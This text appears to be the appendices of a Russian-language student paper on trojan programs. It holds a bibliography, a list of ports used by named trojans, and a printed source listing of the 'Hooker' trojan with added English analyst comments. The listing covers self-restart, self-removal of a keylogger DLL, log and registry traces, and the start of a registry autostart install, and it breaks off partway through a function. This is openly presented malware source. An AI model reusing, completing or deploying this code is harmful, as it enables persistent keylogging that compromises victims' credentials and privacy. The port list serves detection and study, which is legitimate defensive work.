4. Харви М. Дейтел, Дейтел П. Дж., Чофнес Д.Р. Операционные системы. Распределенные системы, сети, безопасность - М.: Бином. Лаборатория знаний, 2006
5. Вебер К., Бадур Г. Безопасность в Windows XP. Готовые решения сложных задач защиты компьютеров. - М.: Diasoft, 2003, 464 с.
6. Хатч, Брайан, Ли, Джеймс, Курц, Джордж Секреты хакеров. Безопасность Linux - готовые решения, 2-е издание, - М.: Издательский дом "Вильямс", 2004, 704 с.
7. Скудис Э. Противостояние хакерам: Пошаговое руководство по компьютерным атакам и эффективной защите: Пер. с англ., - М.: ДМК-Пресс, 2003, 512 с.
8. http://www.bezpeka.com/ru/news/2005/07/22/4850.html
9. http://www.safensoft.ru/safensec/personal/
10. http://www.xndits.ru/index.php?module=articles&c=articles&b=1&a=32
11. http://www.kuban.ru/help/troyan.htm
12. www.cnews.ru
13. www.viruslist.com/ru/viruses/encyclopedia?virusid=34631
14. ru.wikipedia.org
15. http://www.tehnostar.com/newshard/16085.html
16. http://www.hackzona.ru/hz.php?name=News&file=article&sid=3262
17. 
http://www.compress.ru/Archive/CP/2006/3/81/ Приложение 1Список портов, используемых троянскими программами:port 21 - Back Construction, Blade Runner, Doly Trojan, Fore, FTP trojan, Invisible FTP, Larva, MBT, Motiv, Net Administrator, Senna Spy FTP Server, WebEx, WinCrashport 23 - Tiny Telnet Server, Truva Atlport 25 - Aji, Antigen, Email Password Sender, Gip, Happy 99, I Love You, Kuang 2, Magic Horse, Moscow Email Trojan, Naebi, NewApt, ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpyport 31 - Agent 31, Hackers Paradise, Masters Paradise port 41 - DeepThroatport 48 - DRAT port 50 - DRATport 59 - DMSetup port 79 - Firehotckerport 80 - Back End, Executor, Hooker, RingZero port 99 - Hidden Portport 110 - ProMail trojan port 113 - Invisible Identd Deamon, Kazimasport 119 - Happy 99 port 121 - JammerKillahport 123 - Net Controller port 133 - Farnaz, port 146 - Infectorport 146 (UDP) - Infector port 170 - A-trojanport 421 - TCP Wrappers port 456 - Hackers Paradiseport 531 - Rasminport 555 - Ini-Killer, NeTAdministrator, Phase Zero, Stealth Spyport 606 - Secret Serviceport 666 - Attack FTP, Back Construction, NokNok, Cain & Abel, Satanz Backdoor, ServeU, Shadow Phyreport 667 - SniperNet port 669 - DP Trojanport 692 - GayOL port 777 - Aim Spyport 808 - WinHole port 911 - Dark Shadowport 999 - DeepThroat, WinSatan port 1000 - Der Spacher 3port 1001 - Der Spacher 3, Le Guardien, Silencer, WebExport 1010 - Doly Trojan port 1011 - Doly Trojan port 1255 - Scarabport 1256 - Project nEXT port 1269 - Mavericks Matrixport 1313 - NETrojan port 1338 - Millenium Wormport 1349 (UDP) - BO DLL port 1492 - FTP99CMPport 1509 - Psyber Streaming Server port 1524 - Trinooport 1600 - Shivka-Burka port 1777 - Scarabport 1807 - SpySender port 1966 - Fake FTPport 1969 - OpC BO port 1981 - Shockraveport 1999 - BackDoor, TransScout port 1012 - Doly Trojanport 1015 - Doly Trojan port 1016 - Doly Trojanport 1020 - Vampire port 1024 - NetSpyport 1042 - Bla port 1045 - 
Rasminport 1050 - MiniCommand port 1080 - WinHoleport 1081 - WinHole port 1082 - WinHoleport 1083 - WinHole port 1090 - Xtremeport 1095 - RAT port 1097 - RATport 1098 - RAT port 1099 - BFevolution, RATport 1170 - Psyber Stream Server, Streaming Audio trojan, Voiceport 1200 (UDP) - NoBackO port 1201 (UDP) - NoBackOport 1207 - SoftWAR port 1212 - Kaosport 1225 - Scarab port 1234 - Ultors Trojanport 1243 - BackDoor-G, SubSeven, SubSeven Apocalypse, Tilesport 1245 - VooDoo Dollport 2000 - Der Spaeher 3, Insane Network, TransScoutport 2001 - Der Spaeher 3, TransScout, Trojan Cowport 2002 - TransScout port 2003 - TransScoutport 2004 - TransScout port 2005 - TransScoutport 2023 - Ripper port 2080 - WinHoleport 2115 - Bugs port 2140 - Deep Throat, The Invasorport 2155 - Illusion Mailer port 2283 - HVL Rat5port 2300 - Xplorer port 2565 - Strikerport 2583 - WinCrash port 2600 - Digital RootBeerport 2716 - The Prayer port 2773 - SubSevenport 2801 - Phineas Phucker port 3000 - Remote Shutdownport 3024 - WinCrash port 3128 - RingZeroport 3129 - Masters Paradise port 3150 - Deep Throat, The Invasorport 3456 - Teror Trojan port 3459 - Eclipse 2000, Sanctuaryport 3700 - Portal of Doom port 3791 - Eclypseport 3801 (UDP) - Eclypse port 4000 - Skydanceport 4092 - WinCrash port 4242 - Virtual hacking Machineport 4321 - BoBo port 4444 - Prosiak, Swift remoteport 4567 - File Nail port 4590 - ICQTrojanport 5000 - Bubbel, Back Door Setup, Sockets de Troie port 5001 - Back Door Setup, Sockets de Troieport 5010 - Solo port 5011 - One of the Last Trojans (OOTLT)port 5031 - NetMetropolitan port 5031 - NetMetropolitanport 5321 - Firehotcker port 5343 - wCratport 5400 - Blade Runner, Back Construction port 5401 - Blade Runner, Back Constructionport 5402 - Blade Runner, Back Construction port 5550 - Xtcpport 5512 - Illusion Mailer port 5555 - ServeMeport 5556 - BO Facil port 5557 - BO Facilport 5569 - Robo-Hack port 5637 - PC Crasherport 5638 - PC Crasher port 5742 - WinCrashport 5882 (UDP) - 
Y3K RAT port 5888 - Y3K RATport 6000 - The Thing port 6006 - The Thingport 6272 - Secret Service port 6400 - The Thingport 6667 - Schedule Agent port 6669 - Host Control, Vampyreport 6670 - DeepThroat, BackWeb Server, WinNuke eXtreameport 6711 - SubSeven port 6712 - Funny Trojan, SubSevenport 6713 - SubSeven port 6723 - Mstreamport 6771 - DeepThroat port 6776 - 2000 Cracks, BackDoor-G, SubSevenport 6838 (UDP) - Mstream port 6912 - Shit Heep (not port 69123!)port 6939 - Indoctrinationport 6969 - GateCrasher, Priority, IRC 3, NetController port 6970 - GateCrasherport 7000 - Remote Grab, Kazimas, SubSeven port 7001 - Freak88port 7215 - SubSeven port 7300 - NetMonitorport 7301 - NetMonitor port 7306 - NetMonitorport 7307 - NetMonitor port 7308 - NetMonitorport 7424 - Host Control port 7424 (UDP) - Host Controlport 7789 - Back Door Setup, ICKiller port 7983 - Mstreamport 8080 - RingZero port 8787 - Back Orifice 2000port 8897 - HackOffice port 8988 - BacHackport 8989 - Rcon port 9000 - Netministratorport 9325 (UDP) - Mstream port 9400 - InCommandport 9872 - Portal of Doom port 9873 - Portal of Doomport 9874 - Portal of Doom port 9875 - Portal of Doomport 9876 - Cyber Attacker, RUX port 9878 - TransScoutport 9989 - iNi-Killer port 9999 - The Prayerport 10067 (UDP) - Portal of Doom port 10085 - Syphillisport 10086 - Syphillis port 10101 - BrainSpyport 10167 (UDP) - Portal of Doom port 10528 - Host Controlport 10520 - Acid Shivers port 10607 - Comaport 10666 (UDP) - Ambush port 11000 - Senna Spyport 11050 - Host Control port 11051 - Host Controlport 11223 - Progenic trojan, Secret Agent port 12076 - Gjamerport 12223 - Hack+99 KeyLoggerport 12345 - GabanBus, My Pics, NetBus, Pie Bill Gates, Whack Job, X-billport 12346 - GabanBus, NetBus, X-bill port 12349 - BioNetport 12361 - Whack-a-mole port 12362 - Whack-a-moleport 12623 (UDP) - DUN Control port 12624 - Buttmanport 12631 - WhackJob port 12754 - Mstreamport 13000 - Senna Spy port 13010 - Hacker Brazilport 15092 - Host 
Control port 15104 - Mstreamport 16660 - Stacheldracht port 16484 - Mosuckerport 16772 - ICQ Revenge port 16969 - Priorityport 17166 - Mosaic port 17300 - Kuang2 The Virusport 17777 - Nephron port 18753 (UDP) - Shaftport 19864 - ICQ Revenge port 20001 - Millenniumport 20002 - AcidkoR port 20034 - NetBus 2 Pro, NetRex, Whack Jobport 20203 - Chupacabra port 20331 - Blaport 20432 - Shaft port 20432 (UDP) - Shaftport 21544 - GirlFriend, Kidterror, Schwindler, WinSp00fer port 22222 - Prosiakport 23023 - Logged port 23432 - Asylumport 23456 - Evil FTP, Ugly FTP, Whack Job port 23476 - Donald Dickport 23476 (UDP) - Donald Dick port 23477 - Donald Dickport 26274 (UDP) - Delta Source port 26681 - Spy Voiceport 27374 - SubSeven port 27444 (UDP) - Trinooport 27573 - SubSeven port 27665 - Trinooport 29104 - Host Control port 29891 (UDP) - The Unexplainedport 30001 - TerrOr32 port 30029 - AOL Trojanport 30100 - NetSphere port 30101 - NetSphereport 30102 - NetSphere port 30103 - NetSphereport 30103 (UDP) - NetSphere port 30133 - NetSphereport 30303 - Sockets de Troie port 30947 - Intruseport 30999 - Kuang2 port 31335 (UDP) - Trinooport 31336 - Bo Whack, ButtFunnel port 31337 - Baron Night, BO client, BO2, Bo Facilport 31337 (UDP) - BackFire, Back Orifice, DeepBO, Freak>port 31338 - NetSpy DK, ButtFunnel port 31338 (UDP) - Back Orifice, DeepBOport 31339 - NetSpy DK port 31666 - BOWhackport 31785 - Hack+a+Tack port 31787 - Hack+a+Tackport 31788 - Hack+a+Tack port 31789 (UDP) - Hack+a+Tackport 31791 (UDP) - Hack+a+Tack port 31792 - Hack+a+Tackport 32100 - Peanut Brittle, Project nEXT port 32418 - Acid Batteryport 33333 - Blakharaz, Prosiak port 33577 - PsychWardport 33777 - PsychWard port 33911 - Spirit 2001aport 34324 - BigGluck, TN port 34555 (UDP) - Trinoo (Windows)port 35555 (UDP) - Trinoo (Windows) port 37651 - YATport 40412 - The Spy port 40421 - Agent 40421, Masters Paradiseport 40422 - Masters Paradise port 40423 - Masters Paradiseport 40426 - Masters Paradise port 41666 - 
Remote Bootport 41666 (UDP) - Remote Boot port 44444 - Prosiakport 47262 (UDP) - Delta Source port 50505 - Sockets de Troieport 50766 - Fore, Schwindler port 51996 - Cafeiniport 52317 - Acid Battery 2000 port 53001 - Remote Windows Shutdownport 54283 - SubSeven port 54320 - Back Orifice 2000port 54321 - School Bus port 54321 (UDP) - Back Orifice 2000port 57341 - NetRaider port 58339 - ButtFunnelport 60000 - Deep Throat port 60068 - Xzip 6000068port 60411 - Connection port 61348 - Bunker-Hillport 61466 - Telecommando port 61603 - Bunker-Hillport 63485 - Bunker-Hill port 65000 - Devil, Stacheldrachtport 65432 - The Traitor port 65432 (UDP) - The Traitorport 65535 - RC
ПРИЛОЖЕНИЕ 2
Исходный текст троянца Нооker

// NOTE(review): the listing is reproduced exactly as printed on the page. The
// spaces inside the header names, after "sti." / "si." and inside "! =" look
// like artifacts of the page extraction rather than part of the original
// source. `sti` and `gcs` are not declared anywhere in this listing
// (presumably they come from the project headers included below).
#include "hooker. h"
#include "logfunc. h"
#include "common. h"
#include "lzw. h"

// ------------ - registry path ---------------------
// Splits a textual registry path into a predefined root handle and a subkey.
//   s - path that begins with one of the four root names in szRoots
//   r - output buffer; receives the text that follows the root name and one
//       separator character
// Returns the matching predefined HKEY, or NULL when s begins with none of
// the four names (r is left untouched in that case).
HKEY GetRegKey (const char* s,char* r)
{
    const char* szRoots [] = {"HKEY_CLASSES_ROOT","HKEY_CURRENT_USER","HKEY_LOCAL_MACHINE","HKEY_USERS"};
    const HKEY hKeys [] = {HKEY_CLASSES_ROOT,HKEY_CURRENT_USER,HKEY_LOCAL_MACHINE,HKEY_USERS};
    int i;
    for (i=0; i<4; i++)
        if (! strncmp (s, szRoots [i], strlen (szRoots [i]))) {
            // "+ 1" skips the single character after the root name
            // (presumably the backslash separator).
            strcpy (r, s + strlen (szRoots [i]) + 1);
            return hKeys [i];
        };
    return NULL;
};

// -------------- Restart the program again if necessary --------------
// Relaunches the current executable once with a marker argument and ends the
// first instance. The marker is "Restart_" followed by sti.number in
// upper-case hex. When the current command line does not contain the marker,
// a second copy of the same module is started with the marker as its whole
// command line and this process exits; a copy that already carries the marker
// returns without doing anything.
// Analyst note: the second copy is the same image started with a command line
// made up only of the marker string, which is visible in process-creation
// logging. The CreateProcess result is not checked, so the first instance
// exits whether or not the second one started.
void RecurrentStart (void)
{
    char *szCmd,sz1 [0x100],sz2 [0x100];
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    szCmd = GetCommandLine ();
    sprintf (sz1,"Restart_%X",sti. number);
    if (! strstr (szCmd,sz1)) {
        // This is the first copy of the process, make a second one
        memset (&si,0,sizeof (si));
        si. cb = sizeof (si);
        // sz2 receives the path of the running executable (NULL module handle)
        GetModuleFileName (NULL,sz2,sizeof (sz2));
        // Create the process
        CreateProcess (sz2, // pointer to name of executable module
            sz1, // pointer to command line string
            NULL, // pointer to process security attributes
            NULL, // pointer to thread security attributes
            false, // handle inheritance flag
            0, // creation flags
            NULL, // pointer to new environment block
            NULL, // pointer to current directory name
            &si, // pointer to STARTUPINFO
            &pi // pointer to PROCESS_INFORMATION
        );
        ExitProcess (0);
    };
};

// ---------------------------- Uninstall ----------------------------
// Self-removal routine: deletes the registry value named sti.reg_desc, the
// log file sti.logname and the file of the keylogger DLL whose module handle
// is passed in h_keylog, then terminates the process.
// No API return value is checked anywhere in this function.
void AutoKill (HINSTANCE h_keylog)
{
    HKEY hKey,hRoot;
    char sz1 [0x100];
    // gcs is entered and never left: the function ends in ExitProcess.
    EnterCriticalSection (&gcs);
    // the registry entry
    hRoot = GetRegKey (sti. reg_path,sz1);
    if (hRoot) {
        // NOTE(review): the parent-key argument printed here is hKey, which has
        // not been assigned yet, and not the hRoot resolved above; the result of
        // the open is also ignored. As printed, the value deletion below cannot
        // be relied on, so the registry value named sti.reg_desc may still be
        // present as an artifact after this routine has run.
        RegOpenKeyEx (hKey, // handle of open key
            sz1, // address of name of subkey to open
            0, // reserved
            KEY_ALL_ACCESS, // security access mask
            &hKey // address of handle of open key
        );
        RegDeleteValue (hKey,sti. reg_desc);
        RegCloseKey (hKey);
    };
    // Delete the log
    DeleteFile (sti. logname);
    // Delete the keylog dll
    // sz1 is reused: it now receives the DLL's file path. The library is
    // released before the file is deleted (presumably because the file cannot
    // be removed while the module is loaded).
    GetModuleFileName (h_keylog,sz1,sizeof (sz1));
    FreeLibrary (h_keylog);
    DeleteFile (sz1);
    // Adieu!
    ExitProcess (0);
};

// ---------------------- Installation in the registry ---------------------------
// Start of the registry installation routine. The visible part resolves the
// root key and subkey from sti.reg_path (falling back to HKEY_LOCAL_MACHINE
// when no root name matches), creates or opens that key with KEY_ALL_ACCESS
// and returns silently on failure, then copies either sti.full_exe_name or
// sti.exe_name into buf2 depending on sti.fullname.
// Only the beginning of the function is on this page: the listing breaks off
// inside the RegQueryValueEx call, so nothing after that point is described.
void RegInstall (void)
{
    HKEY hKey,hRoot;
    ULONG i,j;
    char buf1 [0x100],buf2 [0x100];
    hRoot = GetRegKey (sti. reg_path,buf1);
    if (! hRoot) hRoot = HKEY_LOCAL_MACHINE;
    if (RegCreateKeyEx (hRoot, // handle of an open key
        buf1, // address of subkey name
        0, // reserved
        "", // address of class string
        REG_OPTION_NON_VOLATILE, // special options flag
        KEY_ALL_ACCESS, // desired security access
        NULL, // address of key security structure
        &hKey, // address of buffer for opened handle
        &i // address of disposition value buffer
        ) ! = ERROR_SUCCESS) return;
    // i is reused: first as the disposition output above, now as a buffer size.
    i = sizeof (buf1);
    if (sti. fullname)
        strcpy (buf2,sti. full_exe_name);
    else
        strcpy (buf2,sti. exe_name);
    if ( (RegQueryValueEx (hKey, // handle of key to query
        sti. reg_desc, // address of name of value to query